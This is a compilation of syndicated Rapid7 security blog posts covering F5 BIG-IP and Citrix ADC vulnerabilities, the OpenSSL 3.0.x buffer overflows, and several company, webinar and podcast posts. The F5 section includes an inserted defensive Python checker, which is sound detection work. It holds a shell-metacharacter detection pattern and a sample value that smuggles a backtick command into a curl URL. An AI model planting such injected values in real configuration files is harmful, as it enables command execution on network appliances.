As with some of the other issues documented here, F5 does not consider this to be a vulnerability and did not assign it a CVE (but does plan to fix it). Rapid7 disagrees with their assessment because SELinux is a security boundary, and bypassing SELinux is a security issue. We’d normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.
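Because /shared/f5_update_action does not exist on a default install, its mere presence is a signal, and the URL lines it contains can be screened for the characters that would change the meaning of an unquoted curl argument. The check below is an added example, not F5 or Rapid7 code. Since the post does not reproduce the file layout, the parser only assumes one value per line; the two sample files are constructed, the injected one reusing the backtick pattern shown above with a harmless command.

```python
"""Triage for a planted /shared/f5_update_action (ID1144057).

Added example, not F5 or Rapid7 code.  The post establishes two facts the
check relies on: the file does not exist on a default install, and the
URL lines in it reach curl without quoting.  So the check reports (1)
whether the file exists at all and (2) any line holding characters that
change the meaning of an unquoted shell argument, or a plaintext http://
update URL.  The post does not reproduce the file layout, so the parser
only assumes one value per line; the samples below are constructed.
"""
import os
import re
import sys

# Characters that let a value escape an unquoted command-line position.
SHELL_META = re.compile(r"[`$;|&<>(){}'\"\\ ]")
URL_LINE = re.compile(r"^(https?)://", re.I)


def audit_update_action(text):
    """Return [(line_no, finding, line), ...]; an empty list means nothing suspicious."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if SHELL_META.search(line):
            findings.append((n, "shell metacharacter in value passed to curl", line))
        m = URL_LINE.match(line)
        if m and m.group(1).lower() != "https":
            findings.append((n, "plaintext http:// update URL", line))
    return findings


def verdict(file_exists, findings):
    """Single-line summary suitable for a fleet report."""
    if not file_exists:
        return "clean: file absent (the default state)"
    if any(f[1].startswith("shell metacharacter") for f in findings):
        return "critical: file present with injected shell syntax"
    if findings:
        return "warning: file present with weak settings"
    return "info: file present; confirm who created it"


def audit_path(path="/shared/f5_update_action"):
    """(verdict, findings) for a file on disk; absence is the expected good state."""
    if not os.path.exists(path):
        return verdict(False, []), []
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings = audit_update_action(fh.read())
    return verdict(True, findings), findings


# Constructed samples (layout assumed: header, success URL, error URL, counters).
SAMPLE_BENIGN = "AAA\nhttps://localhost/success\nhttps://localhost/error\n0\n0\n0\n0\n"
SAMPLE_INJECTED = ("AAA\nhttp://localhost:1234/success`touch /tmp/testshellinjection`\n"
                   "https://localhost/error\n0\n0\n0\n0\n")


if __name__ == "__main__":
    summary, details = audit_path(sys.argv[1] if len(sys.argv) > 1 else "/shared/f5_update_action")
    print(summary)
    for n, finding, line in details:
        print(f"  line {n}: {finding}: {line}")
```

The "file present" verdicts deliberately do not say "clean": a file with well-formed URLs still had to be written by something, and the post notes nothing on the system creates it by default, so the interesting question becomes what did.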


F5 has provided the following remediation advice:

F5 recommends customers review the security advisories published for these issues and evaluate their risk. Engineering hotfixes are available on request for both CVEs, and fixes for all of the issues will be included in future releases.

The known exploitation methods for CVE-2022-41622 require the attacker to know the address for a particular BIG-IP and successfully enact a Cross-Site Request Forgery against an administrator who is using the same browser to browse the web as well as manage their BIG-IP. Normal anti-CSRF techniques will prevent this exploit from succeeding; see K94221585 for more details.

The known exploitation methods for CVE-2022-41800 require that an attacker be authenticated as a valid user with Resource Admin or greater privileges. Therefore, the impact is limited to those customers running with Appliance Mode enabled; see K12815 for more information on Appliance Mode.


  • July, 2022: Issues identified by Rapid7 researcher Ron Bowes
  • Thu, Aug 18, 2022: Privately disclosed findings to F5 PSIRT per Rapid7’s CVD policy
  • Aug-Sep, 2022: Discussion and clarification about the issues with F5
  • Thu, Sep 8, 2022: Extension on vulnerability disclosure date requested, offered Nov 17, 2022
  • Fri, Sep 30, 2022: CVE-2022-41622 and CVE-2022-41800 reserved by F5
  • Wed, Oct 5, 2022: Disclosure date moved to Wed, Nov 16, 2022
  • Wed, Nov 16, 2022: This public disclosure

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41622 and CVE-2022-41800 with authenticated vulnerability checks for BIG-IP, expected to be available in the November 16, 2022 content release.

CVE-2022-27510: Critical Citrix ADC and Gateway Remote Authentication Bypass Vulnerabilities

Post Syndicated from Rapid7 original


On November 8, 2022, Citrix published Citrix Gateway and Citrix ADC Security Bulletin for CVE-2022-27510 CVE-2022-27513 and CVE-2022-27516 announcing fixes for three vulnerabilities:

The most notable vulnerability, CVE-2022-27510, is rated a critical 9.8 for “appliances that are operating as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy),” per Citrix’s advisory, and allows for remote, unauthenticated attackers to take control of a vulnerable system.

Rapid7 has repeatedly observed attacker interest in high-value targets such as Citrix; historically, these appliances are exploited very quickly, so organizations that are impacted by CVE-2022-27510 should patch right away. CISA has issued a warning about CVE-2022-27510 here.

Affected products

The following supported versions of Citrix ADC and Citrix Gateway on customer-managed appliances are affected by this vulnerability (Citrix-managed cloud services customers do not need to take any action):

  • Citrix ADC and Citrix Gateway 13.1 before 13.1-33.47
  • Citrix ADC and Citrix Gateway 13.0 before 13.0-88.12
  • Citrix ADC and Citrix Gateway 12.1 before
  • Citrix ADC 12.1-FIPS before 12.1-55.289
  • Citrix ADC 12.1-NDcPP before 12.1-55.289

Mitigation guidance

Organizations that are impacted by CVE-2022-27510 should update to one of the versions listed below immediately. Additionally, it is strongly recommended that organizations ensure that gateway devices require multi-factor authentication (MFA) for logins and that all authentication attempts are logged and audited regularly.

  • Citrix ADC and Citrix Gateway 13.1-33.47 and later releases
  • Citrix ADC and Citrix Gateway 13.0-88.12 and later releases of 13.0
  • Citrix ADC and Citrix Gateway 12.1-65.21 and later releases of 12.1
  • Citrix ADC 12.1-FIPS 12.1-55.289 and later releases of 12.1-FIPS
  • Citrix ADC 12.1-NDcPP 12.1-55.289 and later releases of 12.1-NDcPP

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to all three CVEs with vulnerability checks expected to be available in the November 15, 2022 content release.

Rapid7’s Impact from OpenSSL Buffer Overflow Vulnerabilities (CVE-2022-3786 & CVE-2022-3602)

Post Syndicated from Rapid7 original

As stated in our OpenSSL Buffer Overflow blog post, the CVE-2022-3786 & CVE-2022-3602 vulnerabilities affecting OpenSSL’s 3.0.x versions both rely on a maliciously crafted email address in a certificate. CVE-2022-3786 can overflow an arbitrary number of bytes on the stack with the “.” character (a period), leading to a denial of service, while CVE-2022-3602 allows a crafted email address to overflow exactly four attacker-controlled bytes on the stack. OpenSSL 3.0.7, released on November 1, 2022, contains fixes for these vulnerabilities.

As part of standard due diligence, Rapid7 evaluates the potential impact of vulnerabilities in its products. This process includes validating the existence of the vulnerable libraries or services, interdependencies, the exploitability of the vulnerability in a given context, and impacts related to applying available patches.

Rapid7’s Insight Agent and Insight Network Sensor were confirmed to be impacted by these vulnerabilities. An Insight Agent fix was released on November 2, 2022 (release version ), and a Network Sensor fix was released on November 10, 2022 (release version ). Rapid7’s assessment has found no other impact on our products. Checks for these vulnerabilities have been released within Nexpose and InsightVM.

Rapid7’s Impact from Apache Commons Text Vulnerability (CVE-2022-42889)

Post Syndicated from Rapid7 original

As stated in our Apache Commons Text blog post, CVE-2022-42889 is a vulnerability in the popular Apache Commons Text library that can result in code execution when processing malicious input, and affects versions 1.5 through 1.9. This vulnerability has been patched as of Commons Text version 1.10.

As part of standard due diligence, Rapid7 evaluates the potential impact of vulnerabilities in its products. This process includes validating the existence of the vulnerable libraries or services, interdependencies, the exploitability of the vulnerability in a given context, and impacts related to applying available patches.

Rapid7’s Nexpose console and InsightVM products are confirmed to currently include commons-text.1.6.jar (as of the date of this post). This library is not directly used within the scan engine, but has a shared dependency within the security console. While Rapid7’s assessment has found no paths to exploit for this vulnerability, we do plan to patch this vulnerability in Nexpose and InsightVM during the month of November 2022.

Common questions when evolving your VM program

Post Syndicated from Rapid7 original

Authored by Natalie Hurd

Perhaps your organization is in the beginning stages of planning a digital transformation, and it’s time to start considering how the security team will adapt. Or maybe your digital transformation is well underway, and the security team is struggling to keep up with the pace of change. Either way, you’ve likely realized that the approach you’ve used with traditional infrastructure will need to evolve as you think about managing risk in your modern ecosystem. After all, a cloud instance running Kubernetes clusters to support application development is quite different from an on-premises Exchange server!

A recent webinar led by two of Rapid7’s leaders, Peter Scott (VP, Product Marketing) and Cindy Stanton (SVP, Product and Customer Marketing), explored the specific challenges of managing the evolution of risk across traditional and cloud environments. The challenges may be plentiful, but the strategies for success are just as numerous!

Over the course of several years, Rapid7 has helped many customers evolve their security programs in order to keep pace with the evolution of technology, and Peter and Cindy have noticed some themes of what tends to make these organizations successful. They advise working with your team & other stakeholders to find answers to the following questions:

  • What sorts of resources does your organization run in the cloud, and who owns them?
  • What does “good” look like when securing your cloud assets, and how will you measure success?
  • Which standards and frameworks is your company subject to, compliance or otherwise?

Gathering answers to these questions as early as possible will not only aid in the efficacy of your security program, it will also help to establish strong relationships & understanding amongst key stakeholders.

Establishing Ownership

Proactively identifying teams and individuals that own the assets in your environment will go a long way towards ensuring speed of resolution when risk is present. Peter strongly suggests working with your organization’s Product or Project Development teams to figure out who owns what and get it documented. This way, when you see a misconfiguration, vulnerability or threat that needs to be dealt with, you know exactly whom to contact to get it resolved, saving important time.

The owners that you identify will not only have a hand to play in fixing problems, they can help make the necessary changes to “shift left” and prevent problems in the first place. The sooner you can identify these stakeholders and build relationships with them, the more successful you’ll be in the long run.

Defining “Good” and Tracking Achievement

Since we’ve established that securing traditional environments is not the same as securing modern environments, we can also agree that the definition of success may not be the same either! After you’ve established ownership, Cindy notes that it’s also important to define what “good” looks like, and how you plan to measure & report on it. Once you’ve created a definition of “good” within your immediate team, it’s also important to socialize that with stakeholders across your organization and track progress towards achieving that state. Tracking & sharing progress is valuable whether your organization meets, exceeds or falls short of your goals; celebrating the wins is just as important as seeking to understand the losses!

Aligning to Standards and Frameworks

Every industry comes with its own set of compliance and regulatory standards that must be adhered to, and it’s important to understand how security fits in. Your team can use these frameworks as a North Star of sorts when considering how to secure your environment, and the cloud aspects of your environment are no exception. Ben Austin, the moderator of the webinar, provides some perspective on the utility of compliance as a method for demonstrating progress in risk reduction. If your assets are more compliant today than they were 3 months ago, that’s a win for every stakeholder involved. If assets are getting less compliant, then you can work with your already-identified asset owners to make a plan to turn the ship around, and contextualize the importance of remaining compliant with them.

Check out our two previous blogs in the series to learn more about Addressing the Evolving Attack Surface and Adapting your VM Program to Regain Control, and watch the full webinar replay any time!

CVE-2022-3786 and CVE-2022-3602: Two High-Severity Buffer Overflow Vulnerabilities in OpenSSL Fixed

Post Syndicated from Rapid7 original

The Rapid7 research team will update this blog post as we learn more details about this vulnerability and its attack surface area. We expect to update this page next by 3 PM EDT on November 1, 2022.

The OpenSSL project released version 3.0.7 on November 1, 2022, to address CVE-2022-3786 and CVE-2022-3602, two high-severity vulnerabilities affecting OpenSSL’s 3.0.x version stream discovered and reported by Polar Bear and Viktor Dukhovni. OpenSSL is a widely used open-source cryptography library that allows for the implementation of secure communications online; this includes generating public/private keys and use of SSL and TLS protocols. (Currently, only the 1.1.1 and 3.0 version streams of OpenSSL are supported). The OpenSSL team warned maintainers and users on October 25 that a critical flaw was on the way — only the second to ever impact the product. Upon release, however, neither vulnerability carried a critical severity rating.

CVE-2022-3786 and CVE-2022-3602 are buffer overflow vulnerabilities in OpenSSL versions below 3.0.7 that both rely on a maliciously crafted email address in a certificate. They differ in two crucial ways: CVE-2022-3786 can overflow an arbitrary number of bytes on the stack with the "." character (a period), leading to denial of service, while CVE-2022-3602 allows a crafted email address to overflow exactly four attacker-controlled bytes on the stack. OpenSSL has a blog available here.

According to the OpenSSL advisory, the vulnerability occurs after certificate verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. In other words, exploitability is significantly limited:

  • In the case where a server is the target (a webserver, database server, mail server, etc): The server must first request client authentication as part of a mutual authentication configuration. This is an unusual configuration, and usually specialized to higher-security use cases.
  • In the case where a client is the target (web browser, email reader, database connector, etc): The attacker would need to first coerce a vulnerable client to connect to a malicious server. This could be done through impersonation (MitM on the network, hijacking an existing resource, etc) or by providing an incentive for a person to click a link (through phishing, watering holes, etc).

For both scenarios, these kinds of attacks do not lend themselves well to widespread exploitation.

Once again, these vulnerabilities only affect the OpenSSL 3.0.x version stream, which has not yet been widely adopted. We are not aware of any exploitation in the wild at the time of the vulnerability’s release on November 1, 2022.

Affected products

  • OpenSSL versions 3.0.0 to 3.0.6 (fixed in 3.0.7)

A broad array of popular distributions and technologies use OpenSSL in their offerings, including many widely used Linux distributions. OpenSSL 1.x, which is unaffected, is still the most popular version stream in use. Major distribution maintainers will likely have individual updates out quickly, but we expect a long tail of advisories and trailing fixes as vendors update additional implementations. Community tracking efforts like this one from Royce Williams, or government tracking efforts like this one from NCSC-NL may also be helpful for following individual vendor impact or remediation communications.

Mitigation guidance

Organizations that are running an affected version of OpenSSL should update to 3.0.7 when practical, prioritizing operating system-level updates and public-facing shared services with direct dependencies on OpenSSL. Emergency patching is not indicated.

Rapid7 customers

Our engineering team is in the process of developing both authenticated and unauthenticated vulnerability checks to allow InsightVM and Nexpose customers to assess their exposure to CVE-2022-3786 and CVE-2022-3602. We expect these checks to be available in a content release today (November 1, 2022).

In the meantime, InsightVM customers can use Query Builder with the query software.description CONTAINS OpenSSL 3 to find potentially affected assets. Nexpose and InsightVM customers can create a Dynamic Asset Group with a filtered asset search looking for Software name contains OpenSSL 3.

Additionally, Nexpose and InsightVM customers can use the following SQL query in a SQL Query Export (Security Console -> Reports -> SQL Query Export) to identify whether they have (any version of) OpenSSL in their environments. This query will produce a CSV file with a list of assets containing installed software with “openssl” in its title, and the corresponding version previously found in scans or Insight Agent-based assessments:

SELECT da.sites AS "Site_Name",
       da.ip_address AS "IP_Address",
       da.mac_address AS "MAC_Address",
       da.host_name AS "DNS_Hostname",
       ds.vendor AS "Vendor",
       ds.name AS "Software_Name",
       ds.family AS "Software_Family",
       ds.version AS "Software_Version",
       ds.software_class AS "Software_Class"
FROM dim_asset_software das
JOIN dim_software ds USING (software_id)
JOIN dim_asset da ON da.asset_id = das.asset_id
WHERE ds.software_class LIKE '%'
  AND ds.name ILIKE '%openssl%'
ORDER BY ds.name ASC

The Software_Version column of the CSV can be used to narrow the scope down to OpenSSL 3.x – note that this query may also return packages that are not OpenSSL proper, e.g. libgnutls-openssl27, that have a version number starting with 3 but do not correspond to 3.0.x of OpenSSL per se.
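An added triage script (not Rapid7's code) that reads the CSV produced by the SQL Query Export above, keeps only OpenSSL in the affected 3.0.0 to 3.0.6 range, and routes look-alike packages such as libgnutls-openssl27 to a review bucket instead of flagging them; the package-name heuristic and the sample rows are assumptions constructed here:

```python
import csv
import io
import re

# Versions the advisory lists as affected: 3.0.0 through 3.0.6 (fixed in 3.0.7).
AFFECTED_LOW = (3, 0, 0)
AFFECTED_HIGH = (3, 0, 6)

# Leading "major.minor.patch" of a package version such as "3.0.5" or "3.0.2-1.el9".
VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")

# Assumption (heuristic, not from the advisory): the OpenSSL package itself is
# named like "openssl", "openssl-libs" or "libopenssl3"; a look-alike such as
# "libgnutls-openssl27" does not match and is sent to manual review instead.
PROPER_RE = re.compile(r"^(lib)?openssl\d*(-[a-z]+)*$")


def parse_version(text):
    """Return (major, minor, patch) from a version string, or None if unparsable."""
    m = VERSION_RE.match(text)
    return tuple(int(g) for g in m.groups()) if m else None


def is_openssl_proper(name):
    """True when the package name denotes OpenSSL itself, not a library that
    merely mentions it (the ILIKE '%openssl%' in the query returns both)."""
    return PROPER_RE.match(name.strip().lower()) is not None


def classify(name, version):
    """'affected' for OpenSSL 3.0.0-3.0.6, 'review' for unparsable versions or
    non-OpenSSL packages on a 3.x version, otherwise 'clear' (1.x is unaffected)."""
    v = parse_version(version)
    if v is None:
        return "review"
    if is_openssl_proper(name):
        return "affected" if AFFECTED_LOW <= v <= AFFECTED_HIGH else "clear"
    return "review" if v[0] == 3 else "clear"


def triage(csv_text):
    """Bucket every row of the export by verdict as (hostname, name, version)."""
    buckets = {"affected": [], "review": [], "clear": []}
    for row in csv.DictReader(io.StringIO(csv_text)):
        verdict = classify(row["Software_Name"], row["Software_Version"])
        buckets[verdict].append(
            (row["DNS_Hostname"], row["Software_Name"], row["Software_Version"]))
    return buckets


# Constructed sample export (not real scan data); columns match the query aliases.
SAMPLE_CSV = """\
Site_Name,IP_Address,MAC_Address,DNS_Hostname,Vendor,Software_Name,Software_Family,Software_Version,Software_Class
web,10.0.0.11,00:11:22:33:44:01,web-01,OpenSSL,openssl,openssl,3.0.5,Library
db,10.0.0.12,00:11:22:33:44:02,db-02,OpenSSL,openssl,openssl,3.0.7,Library
mail,10.0.0.13,00:11:22:33:44:03,mail-03,GnuTLS,libgnutls-openssl27,gnutls,3.7.3,Library
app,10.0.0.14,00:11:22:33:44:04,app-04,OpenSSL,openssl,openssl,1.1.1q,Library
fips,10.0.0.15,00:11:22:33:44:05,fips-05,Red Hat,openssl-libs,openssl,3.0.2-1.el9,Library
"""

if __name__ == "__main__":
    # Distributions often backport fixes without changing the version string,
    # so treat "affected" as a prioritisation hint and confirm with the vendor.
    for verdict, rows in triage(SAMPLE_CSV).items():
        print(f"{verdict}: {rows}")
```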

7 Rapid Questions with Toshio Honda, Sr. Security Solutions Engineer

Post Syndicated from Rapid7 original

You have been with Rapid7 for 4 years now, what originally attracted you to work here?

I worked for a cybersecurity company that is a leader in the “Prevention” area prior to joining Rapid7, and I was looking for the next opportunity based on 3 criteria: “Interesting Products”, “a flexible work environment” and “a supportive and talented team of people”. Rapid7 checked the box for all three of these areas, with a platform of products to help customers’ security operations across areas/categories beyond my experience/expertise, allowing me to stretch and grow my skills. The company is well known for having unique intelligence like Metasploit, as well as being placed #17 in the list of The Cybersecurity 500 by Cybersecurity Ventures. These things attracted me to work here.

What does the team in Japan look like, and what growth have you seen during your time here?

When I joined Rapid7 in January 2018, there were approximately 10+ employees in Japan. These people were primarily made up of Sales and Sales Engineering for products like Nexpose/InsightVM, AppSpider/InsightAppSec, and Metasploit Pro. As the team continues to change and grow, we are now at 20+ employees and hiring in Customer Success and Support, so really broadening the skill sets in the region to better support our customers. We continue to evolve and move towards being a solution/platform provider that solves complex customer challenges and supports their security operations with broader products and managed services. Each individual has capabilities and talent as part of the team, which is a huge difference in terms of ‘types’.

What makes the culture at Rapid7 different from other tech and/or cybersecurity companies?

I believe transparency is a major differentiator. The leadership team in Rapid7 listens to each individual, and you have an opportunity to share your ideas and give feedback whether you are brand new or have been in your field for years.

What are the 3 biggest things you have learned during your time at Rapid7?

Here are the 3 things that came to my mind:
1. Be Proactive
2. Change is a Constant
3. Ask questions to turn the unknown into known

Being proactive means looking outside your immediate team to identify the right people, and gather the right information. Our team in Japan is relatively small, so it’s essential that we partner with other team members from different departments and locations in order to ensure we are anticipating potential challenges and getting the right people involved upfront.

For #2, almost everything can/will change, from our product roadmaps to the needs of our customers. As we anticipate change and embrace the opportunity to grow, it’s important to maintain customers’ expectations and see how Rapid7 can continue to be a strategic partner in maintaining their security solutions.

For #3, as a Solution Architect, I often have conversations with customers, and sometimes see they don’t even know what they need to improve their security posture. It’s important to unravel what they would need by asking questions to clarify their requirements. The same principle can be applied in case of security incidents. If you don’t have visibility (detections) for an incident, you wouldn’t be able to stop a breach. As a practitioner in Rapid7, I keep those

How would you describe your role at Rapid7?

My main role is Solution Architect (Security Solutions Engineer / Sales Engineer), but I’ve also been given the opportunity to learn new skills that are outside of my typical job description. In addition to my main role, I’ve been able to learn more about customer advisory, technical support and account management, and our professional services. Learning in these different areas has grown my confidence as a technical contributor, and provided me with some new insights into real world customer environments and security operations.

Describe your proudest moment working for Rapid7.

This is a really good question. I can’t pick one as there are so many moments in my memory. However, I am always proudest when I am able to solve especially complex or challenging problems customers are struggling with.

What advice would you give someone thinking about coming to work here?

If you enjoy challenging the status quo and solving interesting challenges, Rapid7 would be a great place to work. The company has a track record and history of supporting employees who have new ideas, so you’ll be supported to think creatively and craft your own vision as to how to support our customers and align to business goals.

If you’re interested in learning about open roles at Rapid7, visit our careers page.

[Security Nation] Jeremi Gosney on the Psychology of Password Hygiene

Post Syndicated from Rapid7 original

In this episode of Security Nation, Jen and Tod talk to renowned password security expert Jeremi Gosney about how we are all guilty of bad password practices. He discusses the psychology of how we develop the various words/phrase combinations that become our crackable passwords.

Stick around for the Rapid Rundown, where Tod and Jen dive into a great story for Cybersecurity Awareness Month as well as bad data-governance practices.

Jeremi Gosney

Jeremi Gosney is a renowned password cracker and password security expert. He is a member of the Hashcat core development team, the former CEO of the password cracking firm Terahash, and the author of the Pufferfish and hmac-bcrypt password hashing functions. He also helps run the DEF CON Password Village and the PasswordsCon track at Security BSides Las Vegas.

Show notes

Interview links

Rapid Rundown links

Like the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like Apple Podcasts.

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today

[The Lost Bots] S02E05: The real magic in the Magic Quadrant

Post Syndicated from Rapid7 original

In this episode, we discuss the best use of market research reports, like Magic Quadrants and Waves. If you’re in the market for a new cybersecurity solution, do you just pick a Leader and call it a day?

“Consult the MQ only after you’ve identified two vendors that would be a perfect security solution for you,” say our hosts Jeffrey Gardner, Detection and Response Practice Advisor and Stephen Davis, Lead D&R Sales Technical Advisor. When you have two that meet or exceed the requirements? “I’ll be honest, I might not care about the MQ placement,” says Davis.

Do not under any circumstances leave before the jazz hands bit: they do gather themselves and talk about how outcomes have to run the show, first and always.

Check back with us in November for our next installment of The Lost Bots!

Additional reading: